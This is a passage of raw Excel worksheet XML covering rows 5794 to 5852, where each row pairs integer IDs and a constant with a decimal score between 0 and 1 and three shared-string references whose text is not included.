      </c>
      <c r="F5794" t="s">
        <v>10120</v>
      </c>
      <c r="G5794" t="s">
        <v>11463</v>
      </c>
      <c r="H5794" t="s">
        <v>11464</v>
      </c>
    </row>
    <row r="5795" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5795" s="1">
        <v>5793</v>
      </c>
      <c r="B5795">
        <v>3931</v>
      </c>
      <c r="C5795">
        <v>3931</v>
      </c>
      <c r="D5795">
        <v>3</v>
      </c>
      <c r="E5795">
        <v>0.52859997749328613</v>
      </c>
      <c r="F5795" t="s">
        <v>10120</v>
      </c>
      <c r="G5795" t="s">
        <v>11465</v>
      </c>
      <c r="H5795" t="s">
        <v>11466</v>
      </c>
    </row>
    <row r="5796" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5796" s="1">
        <v>5794</v>
      </c>
      <c r="B5796">
        <v>3933</v>
      </c>
      <c r="C5796">
        <v>3933</v>
      </c>
      <c r="D5796">
        <v>3</v>
      </c>
      <c r="E5796">
        <v>0.99150002002716064</v>
      </c>
      <c r="F5796" t="s">
        <v>10120</v>
      </c>
      <c r="G5796" t="s">
        <v>11467</v>
      </c>
      <c r="H5796" t="s">
        <v>11468</v>
      </c>
    </row>
    <row r="5797" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5797" s="1">
        <v>5795</v>
      </c>
      <c r="B5797">
        <v>688</v>
      </c>
      <c r="C5797">
        <v>688</v>
      </c>
      <c r="D5797">
        <v>3</v>
      </c>
      <c r="E5797">
        <v>0.84570002555847168</v>
      </c>
      <c r="F5797" t="s">
        <v>10120</v>
      </c>
      <c r="G5797" t="s">
        <v>11469</v>
      </c>
      <c r="H5797" t="s">
        <v>11470</v>
      </c>
    </row>
    <row r="5798" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5798" s="1">
        <v>5796</v>
      </c>
      <c r="B5798">
        <v>3943</v>
      </c>
      <c r="C5798">
        <v>3943</v>
      </c>
      <c r="D5798">
        <v>3</v>
      </c>
      <c r="E5798">
        <v>0.9187999963760376</v>
      </c>
      <c r="F5798" t="s">
        <v>10120</v>
      </c>
      <c r="G5798" t="s">
        <v>11471</v>
      </c>
      <c r="H5798" t="s">
        <v>11472</v>
      </c>
    </row>
    <row r="5799" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5799" s="1">
        <v>5797</v>
      </c>
      <c r="B5799">
        <v>687</v>
      </c>
      <c r="C5799">
        <v>687</v>
      </c>
      <c r="D5799">
        <v>3</v>
      </c>
      <c r="E5799">
        <v>0.99500000476837158</v>
      </c>
      <c r="F5799" t="s">
        <v>10120</v>
      </c>
      <c r="G5799" t="s">
        <v>11473</v>
      </c>
      <c r="H5799" t="s">
        <v>11474</v>
      </c>
    </row>
    <row r="5800" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5800" s="1">
        <v>5798</v>
      </c>
      <c r="B5800">
        <v>686</v>
      </c>
      <c r="C5800">
        <v>686</v>
      </c>
      <c r="D5800">
        <v>3</v>
      </c>
      <c r="E5800">
        <v>0.75959998369216919</v>
      </c>
      <c r="F5800" t="s">
        <v>10120</v>
      </c>
      <c r="G5800" t="s">
        <v>11475</v>
      </c>
      <c r="H5800" t="s">
        <v>11476</v>
      </c>
    </row>
    <row r="5801" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5801" s="1">
        <v>5799</v>
      </c>
      <c r="B5801">
        <v>3949</v>
      </c>
      <c r="C5801">
        <v>3949</v>
      </c>
      <c r="D5801">
        <v>3</v>
      </c>
      <c r="E5801">
        <v>0.76260000467300415</v>
      </c>
      <c r="F5801" t="s">
        <v>10120</v>
      </c>
      <c r="G5801" t="s">
        <v>11477</v>
      </c>
      <c r="H5801" t="s">
        <v>11478</v>
      </c>
    </row>
    <row r="5802" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5802" s="1">
        <v>5800</v>
      </c>
      <c r="B5802">
        <v>3952</v>
      </c>
      <c r="C5802">
        <v>3952</v>
      </c>
      <c r="D5802">
        <v>3</v>
      </c>
      <c r="E5802">
        <v>0.40070000290870672</v>
      </c>
      <c r="F5802" t="s">
        <v>10120</v>
      </c>
      <c r="G5802" t="s">
        <v>11479</v>
      </c>
      <c r="H5802" t="s">
        <v>11480</v>
      </c>
    </row>
    <row r="5803" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5803" s="1">
        <v>5801</v>
      </c>
      <c r="B5803">
        <v>3953</v>
      </c>
      <c r="C5803">
        <v>3953</v>
      </c>
      <c r="D5803">
        <v>3</v>
      </c>
      <c r="E5803">
        <v>0.43070000410079962</v>
      </c>
      <c r="F5803" t="s">
        <v>10120</v>
      </c>
      <c r="G5803" t="s">
        <v>11481</v>
      </c>
      <c r="H5803" t="s">
        <v>11482</v>
      </c>
    </row>
    <row r="5804" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5804" s="1">
        <v>5802</v>
      </c>
      <c r="B5804">
        <v>3954</v>
      </c>
      <c r="C5804">
        <v>3954</v>
      </c>
      <c r="D5804">
        <v>3</v>
      </c>
      <c r="E5804">
        <v>0.64859998226165771</v>
      </c>
      <c r="F5804" t="s">
        <v>10120</v>
      </c>
      <c r="G5804" t="s">
        <v>11483</v>
      </c>
      <c r="H5804" t="s">
        <v>11484</v>
      </c>
    </row>
    <row r="5805" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5805" s="1">
        <v>5803</v>
      </c>
      <c r="B5805">
        <v>685</v>
      </c>
      <c r="C5805">
        <v>685</v>
      </c>
      <c r="D5805">
        <v>3</v>
      </c>
      <c r="E5805">
        <v>0.78259998559951782</v>
      </c>
      <c r="F5805" t="s">
        <v>10120</v>
      </c>
      <c r="G5805" t="s">
        <v>11485</v>
      </c>
      <c r="H5805" t="s">
        <v>11405</v>
      </c>
    </row>
    <row r="5806" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5806" s="1">
        <v>5804</v>
      </c>
      <c r="B5806">
        <v>684</v>
      </c>
      <c r="C5806">
        <v>684</v>
      </c>
      <c r="D5806">
        <v>3</v>
      </c>
      <c r="E5806">
        <v>0.99769997596740723</v>
      </c>
      <c r="F5806" t="s">
        <v>10120</v>
      </c>
      <c r="G5806" t="s">
        <v>11486</v>
      </c>
      <c r="H5806" t="s">
        <v>11487</v>
      </c>
    </row>
    <row r="5807" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5807" s="1">
        <v>5805</v>
      </c>
      <c r="B5807">
        <v>3960</v>
      </c>
      <c r="C5807">
        <v>3960</v>
      </c>
      <c r="D5807">
        <v>3</v>
      </c>
      <c r="E5807">
        <v>0.82639998197555542</v>
      </c>
      <c r="F5807" t="s">
        <v>10120</v>
      </c>
      <c r="G5807" t="s">
        <v>11488</v>
      </c>
      <c r="H5807" t="s">
        <v>11489</v>
      </c>
    </row>
    <row r="5808" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5808" s="1">
        <v>5806</v>
      </c>
      <c r="B5808">
        <v>3890</v>
      </c>
      <c r="C5808">
        <v>3890</v>
      </c>
      <c r="D5808">
        <v>3</v>
      </c>
      <c r="E5808">
        <v>0.99409997463226318</v>
      </c>
      <c r="F5808" t="s">
        <v>10120</v>
      </c>
      <c r="G5808" t="s">
        <v>11490</v>
      </c>
      <c r="H5808" t="s">
        <v>11491</v>
      </c>
    </row>
    <row r="5809" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5809" s="1">
        <v>5807</v>
      </c>
      <c r="B5809">
        <v>3832</v>
      </c>
      <c r="C5809">
        <v>3832</v>
      </c>
      <c r="D5809">
        <v>3</v>
      </c>
      <c r="E5809">
        <v>0.60199999809265137</v>
      </c>
      <c r="F5809" t="s">
        <v>10120</v>
      </c>
      <c r="G5809" t="s">
        <v>11492</v>
      </c>
      <c r="H5809" t="s">
        <v>11493</v>
      </c>
    </row>
    <row r="5810" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5810" s="1">
        <v>5808</v>
      </c>
      <c r="B5810">
        <v>691</v>
      </c>
      <c r="C5810">
        <v>691</v>
      </c>
      <c r="D5810">
        <v>3</v>
      </c>
      <c r="E5810">
        <v>0.81269997358322144</v>
      </c>
      <c r="F5810" t="s">
        <v>10120</v>
      </c>
      <c r="G5810" t="s">
        <v>11494</v>
      </c>
      <c r="H5810" t="s">
        <v>11495</v>
      </c>
    </row>
    <row r="5811" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5811" s="1">
        <v>5809</v>
      </c>
      <c r="B5811">
        <v>3881</v>
      </c>
      <c r="C5811">
        <v>3881</v>
      </c>
      <c r="D5811">
        <v>3</v>
      </c>
      <c r="E5811">
        <v>0.37490001320838928</v>
      </c>
      <c r="F5811" t="s">
        <v>10120</v>
      </c>
      <c r="G5811" t="s">
        <v>11496</v>
      </c>
      <c r="H5811" t="s">
        <v>11497</v>
      </c>
    </row>
    <row r="5812" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5812" s="1">
        <v>5810</v>
      </c>
      <c r="B5812">
        <v>696</v>
      </c>
      <c r="C5812">
        <v>696</v>
      </c>
      <c r="D5812">
        <v>3</v>
      </c>
      <c r="E5812">
        <v>0.64230000972747803</v>
      </c>
      <c r="F5812" t="s">
        <v>10120</v>
      </c>
      <c r="G5812" t="s">
        <v>11498</v>
      </c>
      <c r="H5812" t="s">
        <v>11499</v>
      </c>
    </row>
    <row r="5813" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5813" s="1">
        <v>5811</v>
      </c>
      <c r="B5813">
        <v>3838</v>
      </c>
      <c r="C5813">
        <v>3838</v>
      </c>
      <c r="D5813">
        <v>3</v>
      </c>
      <c r="E5813">
        <v>0.84380000829696655</v>
      </c>
      <c r="F5813" t="s">
        <v>10120</v>
      </c>
      <c r="G5813" t="s">
        <v>11500</v>
      </c>
      <c r="H5813" t="s">
        <v>11501</v>
      </c>
    </row>
    <row r="5814" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5814" s="1">
        <v>5812</v>
      </c>
      <c r="B5814">
        <v>3840</v>
      </c>
      <c r="C5814">
        <v>3840</v>
      </c>
      <c r="D5814">
        <v>3</v>
      </c>
      <c r="E5814">
        <v>0.68669998645782471</v>
      </c>
      <c r="F5814" t="s">
        <v>10120</v>
      </c>
      <c r="G5814" t="s">
        <v>11502</v>
      </c>
      <c r="H5814" t="s">
        <v>11503</v>
      </c>
    </row>
    <row r="5815" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5815" s="1">
        <v>5813</v>
      </c>
      <c r="B5815">
        <v>3841</v>
      </c>
      <c r="C5815">
        <v>3841</v>
      </c>
      <c r="D5815">
        <v>3</v>
      </c>
      <c r="E5815">
        <v>0.55159997940063477</v>
      </c>
      <c r="F5815" t="s">
        <v>10120</v>
      </c>
      <c r="G5815" t="s">
        <v>11504</v>
      </c>
      <c r="H5815" t="s">
        <v>11505</v>
      </c>
    </row>
    <row r="5816" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5816" s="1">
        <v>5814</v>
      </c>
      <c r="B5816">
        <v>3842</v>
      </c>
      <c r="C5816">
        <v>3842</v>
      </c>
      <c r="D5816">
        <v>3</v>
      </c>
      <c r="E5816">
        <v>0.39599999785423279</v>
      </c>
      <c r="F5816" t="s">
        <v>10120</v>
      </c>
      <c r="G5816" t="s">
        <v>11506</v>
      </c>
      <c r="H5816" t="s">
        <v>11507</v>
      </c>
    </row>
    <row r="5817" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5817" s="1">
        <v>5815</v>
      </c>
      <c r="B5817">
        <v>3846</v>
      </c>
      <c r="C5817">
        <v>3846</v>
      </c>
      <c r="D5817">
        <v>3</v>
      </c>
      <c r="E5817">
        <v>0.76319998502731323</v>
      </c>
      <c r="F5817" t="s">
        <v>10120</v>
      </c>
      <c r="G5817" t="s">
        <v>11508</v>
      </c>
      <c r="H5817" t="s">
        <v>11509</v>
      </c>
    </row>
    <row r="5818" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5818" s="1">
        <v>5816</v>
      </c>
      <c r="B5818">
        <v>3863</v>
      </c>
      <c r="C5818">
        <v>3863</v>
      </c>
      <c r="D5818">
        <v>3</v>
      </c>
      <c r="E5818">
        <v>0.92250001430511475</v>
      </c>
      <c r="F5818" t="s">
        <v>10120</v>
      </c>
      <c r="G5818" t="s">
        <v>11510</v>
      </c>
      <c r="H5818" t="s">
        <v>11511</v>
      </c>
    </row>
    <row r="5819" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5819" s="1">
        <v>5817</v>
      </c>
      <c r="B5819">
        <v>3864</v>
      </c>
      <c r="C5819">
        <v>3864</v>
      </c>
      <c r="D5819">
        <v>3</v>
      </c>
      <c r="E5819">
        <v>0.94929999113082886</v>
      </c>
      <c r="F5819" t="s">
        <v>10120</v>
      </c>
      <c r="G5819" t="s">
        <v>11512</v>
      </c>
      <c r="H5819" t="s">
        <v>11513</v>
      </c>
    </row>
    <row r="5820" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5820" s="1">
        <v>5818</v>
      </c>
      <c r="B5820">
        <v>3865</v>
      </c>
      <c r="C5820">
        <v>3865</v>
      </c>
      <c r="D5820">
        <v>3</v>
      </c>
      <c r="E5820">
        <v>0.98890000581741333</v>
      </c>
      <c r="F5820" t="s">
        <v>10120</v>
      </c>
      <c r="G5820" t="s">
        <v>11514</v>
      </c>
      <c r="H5820" t="s">
        <v>11515</v>
      </c>
    </row>
    <row r="5821" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5821" s="1">
        <v>5819</v>
      </c>
      <c r="B5821">
        <v>3867</v>
      </c>
      <c r="C5821">
        <v>3867</v>
      </c>
      <c r="D5821">
        <v>3</v>
      </c>
      <c r="E5821">
        <v>0.86210000514984131</v>
      </c>
      <c r="F5821" t="s">
        <v>10120</v>
      </c>
      <c r="G5821" t="s">
        <v>11516</v>
      </c>
      <c r="H5821" t="s">
        <v>11517</v>
      </c>
    </row>
    <row r="5822" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5822" s="1">
        <v>5820</v>
      </c>
      <c r="B5822">
        <v>3872</v>
      </c>
      <c r="C5822">
        <v>3872</v>
      </c>
      <c r="D5822">
        <v>3</v>
      </c>
      <c r="E5822">
        <v>0.97939997911453247</v>
      </c>
      <c r="F5822" t="s">
        <v>10120</v>
      </c>
      <c r="G5822" t="s">
        <v>11518</v>
      </c>
      <c r="H5822" t="s">
        <v>11519</v>
      </c>
    </row>
    <row r="5823" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5823" s="1">
        <v>5821</v>
      </c>
      <c r="B5823">
        <v>3873</v>
      </c>
      <c r="C5823">
        <v>3873</v>
      </c>
      <c r="D5823">
        <v>3</v>
      </c>
      <c r="E5823">
        <v>0.92960000038146973</v>
      </c>
      <c r="F5823" t="s">
        <v>10120</v>
      </c>
      <c r="G5823" t="s">
        <v>11520</v>
      </c>
      <c r="H5823" t="s">
        <v>11521</v>
      </c>
    </row>
    <row r="5824" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5824" s="1">
        <v>5822</v>
      </c>
      <c r="B5824">
        <v>3874</v>
      </c>
      <c r="C5824">
        <v>3874</v>
      </c>
      <c r="D5824">
        <v>3</v>
      </c>
      <c r="E5824">
        <v>0.55190002918243408</v>
      </c>
      <c r="F5824" t="s">
        <v>10120</v>
      </c>
      <c r="G5824" t="s">
        <v>11522</v>
      </c>
      <c r="H5824" t="s">
        <v>11523</v>
      </c>
    </row>
    <row r="5825" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5825" s="1">
        <v>5823</v>
      </c>
      <c r="B5825">
        <v>3875</v>
      </c>
      <c r="C5825">
        <v>3875</v>
      </c>
      <c r="D5825">
        <v>3</v>
      </c>
      <c r="E5825">
        <v>0.98729997873306274</v>
      </c>
      <c r="F5825" t="s">
        <v>10120</v>
      </c>
      <c r="G5825" t="s">
        <v>11524</v>
      </c>
      <c r="H5825" t="s">
        <v>11525</v>
      </c>
    </row>
    <row r="5826" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5826" s="1">
        <v>5824</v>
      </c>
      <c r="B5826">
        <v>694</v>
      </c>
      <c r="C5826">
        <v>694</v>
      </c>
      <c r="D5826">
        <v>3</v>
      </c>
      <c r="E5826">
        <v>0.9495999813079834</v>
      </c>
      <c r="F5826" t="s">
        <v>10120</v>
      </c>
      <c r="G5826" t="s">
        <v>11526</v>
      </c>
      <c r="H5826" t="s">
        <v>11527</v>
      </c>
    </row>
    <row r="5827" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5827" s="1">
        <v>5825</v>
      </c>
      <c r="B5827">
        <v>693</v>
      </c>
      <c r="C5827">
        <v>693</v>
      </c>
      <c r="D5827">
        <v>3</v>
      </c>
      <c r="E5827">
        <v>0.99330002069473267</v>
      </c>
      <c r="F5827" t="s">
        <v>10120</v>
      </c>
      <c r="G5827" t="s">
        <v>11528</v>
      </c>
      <c r="H5827" t="s">
        <v>11175</v>
      </c>
    </row>
    <row r="5828" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5828" s="1">
        <v>5826</v>
      </c>
      <c r="B5828">
        <v>692</v>
      </c>
      <c r="C5828">
        <v>692</v>
      </c>
      <c r="D5828">
        <v>3</v>
      </c>
      <c r="E5828">
        <v>0.99889999628067017</v>
      </c>
      <c r="F5828" t="s">
        <v>10120</v>
      </c>
      <c r="G5828" t="s">
        <v>11529</v>
      </c>
      <c r="H5828" t="s">
        <v>11530</v>
      </c>
    </row>
    <row r="5829" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5829" s="1">
        <v>5827</v>
      </c>
      <c r="B5829">
        <v>3883</v>
      </c>
      <c r="C5829">
        <v>3883</v>
      </c>
      <c r="D5829">
        <v>3</v>
      </c>
      <c r="E5829">
        <v>0.51029998064041138</v>
      </c>
      <c r="F5829" t="s">
        <v>10120</v>
      </c>
      <c r="G5829" t="s">
        <v>11531</v>
      </c>
      <c r="H5829" t="s">
        <v>11532</v>
      </c>
    </row>
    <row r="5830" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5830" s="1">
        <v>5828</v>
      </c>
      <c r="B5830">
        <v>730</v>
      </c>
      <c r="C5830">
        <v>730</v>
      </c>
      <c r="D5830">
        <v>3</v>
      </c>
      <c r="E5830">
        <v>0.72229999303817749</v>
      </c>
      <c r="F5830" t="s">
        <v>10120</v>
      </c>
      <c r="G5830" t="s">
        <v>11533</v>
      </c>
      <c r="H5830" t="s">
        <v>11534</v>
      </c>
    </row>
    <row r="5831" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5831" s="1">
        <v>5829</v>
      </c>
      <c r="B5831">
        <v>3696</v>
      </c>
      <c r="C5831">
        <v>3696</v>
      </c>
      <c r="D5831">
        <v>3</v>
      </c>
      <c r="E5831">
        <v>0.91180002689361572</v>
      </c>
      <c r="F5831" t="s">
        <v>10120</v>
      </c>
      <c r="G5831" t="s">
        <v>11535</v>
      </c>
      <c r="H5831" t="s">
        <v>11536</v>
      </c>
    </row>
    <row r="5832" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5832" s="1">
        <v>5830</v>
      </c>
      <c r="B5832">
        <v>733</v>
      </c>
      <c r="C5832">
        <v>733</v>
      </c>
      <c r="D5832">
        <v>3</v>
      </c>
      <c r="E5832">
        <v>0.60729998350143433</v>
      </c>
      <c r="F5832" t="s">
        <v>10120</v>
      </c>
      <c r="G5832" t="s">
        <v>11537</v>
      </c>
      <c r="H5832" t="s">
        <v>11538</v>
      </c>
    </row>
    <row r="5833" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5833" s="1">
        <v>5831</v>
      </c>
      <c r="B5833">
        <v>812</v>
      </c>
      <c r="C5833">
        <v>812</v>
      </c>
      <c r="D5833">
        <v>3</v>
      </c>
      <c r="E5833">
        <v>0.70639997720718384</v>
      </c>
      <c r="F5833" t="s">
        <v>10120</v>
      </c>
      <c r="G5833" t="s">
        <v>11539</v>
      </c>
      <c r="H5833" t="s">
        <v>11540</v>
      </c>
    </row>
    <row r="5834" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5834" s="1">
        <v>5832</v>
      </c>
      <c r="B5834">
        <v>3459</v>
      </c>
      <c r="C5834">
        <v>3459</v>
      </c>
      <c r="D5834">
        <v>3</v>
      </c>
      <c r="E5834">
        <v>0.67019999027252197</v>
      </c>
      <c r="F5834" t="s">
        <v>10120</v>
      </c>
      <c r="G5834" t="s">
        <v>11541</v>
      </c>
      <c r="H5834" t="s">
        <v>11542</v>
      </c>
    </row>
    <row r="5835" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5835" s="1">
        <v>5833</v>
      </c>
      <c r="B5835">
        <v>3460</v>
      </c>
      <c r="C5835">
        <v>3460</v>
      </c>
      <c r="D5835">
        <v>3</v>
      </c>
      <c r="E5835">
        <v>0.48690000176429749</v>
      </c>
      <c r="F5835" t="s">
        <v>10120</v>
      </c>
      <c r="G5835" t="s">
        <v>11543</v>
      </c>
      <c r="H5835" t="s">
        <v>11544</v>
      </c>
    </row>
    <row r="5836" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5836" s="1">
        <v>5834</v>
      </c>
      <c r="B5836">
        <v>811</v>
      </c>
      <c r="C5836">
        <v>811</v>
      </c>
      <c r="D5836">
        <v>3</v>
      </c>
      <c r="E5836">
        <v>0.7070000171661377</v>
      </c>
      <c r="F5836" t="s">
        <v>10120</v>
      </c>
      <c r="G5836" t="s">
        <v>11545</v>
      </c>
      <c r="H5836" t="s">
        <v>11546</v>
      </c>
    </row>
    <row r="5837" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5837" s="1">
        <v>5835</v>
      </c>
      <c r="B5837">
        <v>810</v>
      </c>
      <c r="C5837">
        <v>810</v>
      </c>
      <c r="D5837">
        <v>3</v>
      </c>
      <c r="E5837">
        <v>0.83240002393722534</v>
      </c>
      <c r="F5837" t="s">
        <v>10120</v>
      </c>
      <c r="G5837" t="s">
        <v>11547</v>
      </c>
      <c r="H5837" t="s">
        <v>11548</v>
      </c>
    </row>
    <row r="5838" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5838" s="1">
        <v>5836</v>
      </c>
      <c r="B5838">
        <v>806</v>
      </c>
      <c r="C5838">
        <v>806</v>
      </c>
      <c r="D5838">
        <v>3</v>
      </c>
      <c r="E5838">
        <v>0.81480002403259277</v>
      </c>
      <c r="F5838" t="s">
        <v>10120</v>
      </c>
      <c r="G5838" t="s">
        <v>11549</v>
      </c>
      <c r="H5838" t="s">
        <v>11550</v>
      </c>
    </row>
    <row r="5839" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5839" s="1">
        <v>5837</v>
      </c>
      <c r="B5839">
        <v>3510</v>
      </c>
      <c r="C5839">
        <v>3510</v>
      </c>
      <c r="D5839">
        <v>3</v>
      </c>
      <c r="E5839">
        <v>0.98329997062683105</v>
      </c>
      <c r="F5839" t="s">
        <v>10120</v>
      </c>
      <c r="G5839" t="s">
        <v>11551</v>
      </c>
      <c r="H5839" t="s">
        <v>11552</v>
      </c>
    </row>
    <row r="5840" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5840" s="1">
        <v>5838</v>
      </c>
      <c r="B5840">
        <v>3511</v>
      </c>
      <c r="C5840">
        <v>3511</v>
      </c>
      <c r="D5840">
        <v>3</v>
      </c>
      <c r="E5840">
        <v>0.5275999903678894</v>
      </c>
      <c r="F5840" t="s">
        <v>10120</v>
      </c>
      <c r="G5840" t="s">
        <v>11553</v>
      </c>
      <c r="H5840" t="s">
        <v>11554</v>
      </c>
    </row>
    <row r="5841" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5841" s="1">
        <v>5839</v>
      </c>
      <c r="B5841">
        <v>3513</v>
      </c>
      <c r="C5841">
        <v>3513</v>
      </c>
      <c r="D5841">
        <v>3</v>
      </c>
      <c r="E5841">
        <v>0.68409997224807739</v>
      </c>
      <c r="F5841" t="s">
        <v>10120</v>
      </c>
      <c r="G5841" t="s">
        <v>11555</v>
      </c>
      <c r="H5841" t="s">
        <v>11556</v>
      </c>
    </row>
    <row r="5842" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5842" s="1">
        <v>5840</v>
      </c>
      <c r="B5842">
        <v>3522</v>
      </c>
      <c r="C5842">
        <v>3522</v>
      </c>
      <c r="D5842">
        <v>3</v>
      </c>
      <c r="E5842">
        <v>0.6086999773979187</v>
      </c>
      <c r="F5842" t="s">
        <v>10120</v>
      </c>
      <c r="G5842" t="s">
        <v>11557</v>
      </c>
      <c r="H5842" t="s">
        <v>11558</v>
      </c>
    </row>
    <row r="5843" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5843" s="1">
        <v>5841</v>
      </c>
      <c r="B5843">
        <v>3527</v>
      </c>
      <c r="C5843">
        <v>3527</v>
      </c>
      <c r="D5843">
        <v>3</v>
      </c>
      <c r="E5843">
        <v>0.99570000171661377</v>
      </c>
      <c r="F5843" t="s">
        <v>10120</v>
      </c>
      <c r="G5843" t="s">
        <v>11559</v>
      </c>
      <c r="H5843" t="s">
        <v>11560</v>
      </c>
    </row>
    <row r="5844" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5844" s="1">
        <v>5842</v>
      </c>
      <c r="B5844">
        <v>3530</v>
      </c>
      <c r="C5844">
        <v>3530</v>
      </c>
      <c r="D5844">
        <v>3</v>
      </c>
      <c r="E5844">
        <v>0.90689998865127563</v>
      </c>
      <c r="F5844" t="s">
        <v>10120</v>
      </c>
      <c r="G5844" t="s">
        <v>11561</v>
      </c>
      <c r="H5844" t="s">
        <v>11562</v>
      </c>
    </row>
    <row r="5845" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5845" s="1">
        <v>5843</v>
      </c>
      <c r="B5845">
        <v>3541</v>
      </c>
      <c r="C5845">
        <v>3541</v>
      </c>
      <c r="D5845">
        <v>3</v>
      </c>
      <c r="E5845">
        <v>0.74210000038146973</v>
      </c>
      <c r="F5845" t="s">
        <v>10120</v>
      </c>
      <c r="G5845" t="s">
        <v>11563</v>
      </c>
      <c r="H5845" t="s">
        <v>11564</v>
      </c>
    </row>
    <row r="5846" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5846" s="1">
        <v>5844</v>
      </c>
      <c r="B5846">
        <v>796</v>
      </c>
      <c r="C5846">
        <v>796</v>
      </c>
      <c r="D5846">
        <v>3</v>
      </c>
      <c r="E5846">
        <v>0.4828999936580658</v>
      </c>
      <c r="F5846" t="s">
        <v>10120</v>
      </c>
      <c r="G5846" t="s">
        <v>11565</v>
      </c>
      <c r="H5846" t="s">
        <v>11566</v>
      </c>
    </row>
    <row r="5847" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5847" s="1">
        <v>5845</v>
      </c>
      <c r="B5847">
        <v>790</v>
      </c>
      <c r="C5847">
        <v>790</v>
      </c>
      <c r="D5847">
        <v>3</v>
      </c>
      <c r="E5847">
        <v>0.70010000467300415</v>
      </c>
      <c r="F5847" t="s">
        <v>10120</v>
      </c>
      <c r="G5847" t="s">
        <v>11567</v>
      </c>
      <c r="H5847" t="s">
        <v>11568</v>
      </c>
    </row>
    <row r="5848" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5848" s="1">
        <v>5846</v>
      </c>
      <c r="B5848">
        <v>3556</v>
      </c>
      <c r="C5848">
        <v>3556</v>
      </c>
      <c r="D5848">
        <v>3</v>
      </c>
      <c r="E5848">
        <v>0.83619999885559082</v>
      </c>
      <c r="F5848" t="s">
        <v>10120</v>
      </c>
      <c r="G5848" t="s">
        <v>11569</v>
      </c>
      <c r="H5848" t="s">
        <v>11570</v>
      </c>
    </row>
    <row r="5849" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5849" s="1">
        <v>5847</v>
      </c>
      <c r="B5849">
        <v>3560</v>
      </c>
      <c r="C5849">
        <v>3560</v>
      </c>
      <c r="D5849">
        <v>3</v>
      </c>
      <c r="E5849">
        <v>0.90539997816085815</v>
      </c>
      <c r="F5849" t="s">
        <v>10120</v>
      </c>
      <c r="G5849" t="s">
        <v>11571</v>
      </c>
      <c r="H5849" t="s">
        <v>11572</v>
      </c>
    </row>
    <row r="5850" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5850" s="1">
        <v>5848</v>
      </c>
      <c r="B5850">
        <v>3444</v>
      </c>
      <c r="C5850">
        <v>3444</v>
      </c>
      <c r="D5850">
        <v>3</v>
      </c>
      <c r="E5850">
        <v>0.91259998083114624</v>
      </c>
      <c r="F5850" t="s">
        <v>10120</v>
      </c>
      <c r="G5850" t="s">
        <v>11573</v>
      </c>
      <c r="H5850" t="s">
        <v>11574</v>
      </c>
    </row>
    <row r="5851" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5851" s="1">
        <v>5849</v>
      </c>
      <c r="B5851">
        <v>3564</v>
      </c>
      <c r="C5851">
        <v>3564</v>
      </c>
      <c r="D5851">
        <v>3</v>
      </c>
      <c r="E5851">
        <v>0.99150002002716064</v>
      </c>
      <c r="F5851" t="s">
        <v>10120</v>
      </c>
      <c r="G5851" t="s">
        <v>11575</v>
      </c>
      <c r="H5851" t="s">
        <v>11576</v>
      </c>
    </row>
    <row r="5852" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5852" s="1">
        <v>5850</v>
      </c>
      <c r="B5852">
        <v>3442</v>
      </c>
      <c r="C5852">
        <v>3442</v>
      </c>
      <c r="D5852">
        <v>3</v>
      </c>
      <c r="E5852">
        <v>0.99809998273849487</v>
      </c>
      <c r="F5852" t="s">
        <v>10120</v>
      </c>
      <c r="G5852" t="s">
        <v>11577</v>
      </c>
      <c r="H5852" t="s">
        <v>11578</v>
      </c>
    </row>
    <row r="5853" spans="1:8" x14ac:dyDescent="0.45">
